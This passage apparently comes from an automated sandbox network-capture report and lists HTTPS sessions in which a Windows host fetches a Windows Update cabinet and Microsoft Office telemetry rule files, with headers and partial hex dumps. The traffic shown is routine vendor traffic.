                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:19 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            101192.168.2.54982320.109.210.53443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:20 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=txFb4ztSLLEgxVe&MD=N4lU5e1w HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept: */*
                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                            2024-11-29 07:31:21 UTC560INHTTP/1.1 200 OK
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Expires: -1
                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                            MS-CorrelationId: 725165db-f1a0-433c-9538-dfdc9f7fcf8a
                                                                                                                            MS-RequestId: c53b6dd8-7859-4fd5-af48-3be36bd6199d
                                                                                                                            MS-CV: iMDJCRn7d0uxLbtg.0
                                                                                                                            X-Microsoft-SLSClientCache: 1440
                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:19 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 30005
                                                                                                                            2024-11-29 07:31:21 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                            2024-11-29 07:31:21 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            102192.168.2.54982413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:20 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:21 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:21 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1356
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                            x-ms-request-id: edbee89c-c01e-00a2-7069-402327000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073121Z-174f7845968qj8jrhC1EWRh41s0000000zeg00000000b6c6
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:21 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            103192.168.2.54982513.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:21 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:21 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:21 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1395
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                            x-ms-request-id: 6f07c4eb-901e-0029-3066-40274a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073121Z-174f7845968vqt9xhC1EWRgten0000000zhg00000000bug5
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:21 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            104192.168.2.54982613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:21 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:21 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:21 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1358
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                            x-ms-request-id: 2a3cc61f-301e-001f-7491-3faa3a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073121Z-174f7845968j6t2phC1EWRcfe80000000zt00000000044th
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:21 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            105192.168.2.54982813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:21 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:21 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:21 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1358
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                            x-ms-request-id: 3452a663-f01e-003c-1f91-3f8cf0000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073121Z-174f7845968cdxdrhC1EWRg0en0000000zpg000000000q1m
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:21 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            106192.168.2.54982713.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:21 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:21 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:21 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1395
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                            x-ms-request-id: 390894ac-101e-0017-4400-4247c7000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073121Z-174f784596886s2bhC1EWR743w0000000zm00000000086cn
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:21 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            107192.168.2.54982913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:23 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:23 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:23 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1389
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                            x-ms-request-id: ca68633c-201e-006e-1f8a-3fbbe3000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073123Z-174f78459685m244hC1EWRgp2c0000000zdg0000000067rw
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:23 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            108192.168.2.54983013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:23 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:23 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:23 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1352
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                            x-ms-request-id: ee9d1ea0-001e-00a2-4791-3fd4d5000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073123Z-174f7845968zgtf6hC1EWRqd8s0000000skg000000004ags
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:23 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            109192.168.2.54983113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:23 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:23 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:23 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1405
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                            x-ms-request-id: d3a187f9-801e-0078-2263-40bac6000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073123Z-174f7845968n2hr8hC1EWR9cag0000000za0000000002p9e
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:23 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            110192.168.2.54983213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:23 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
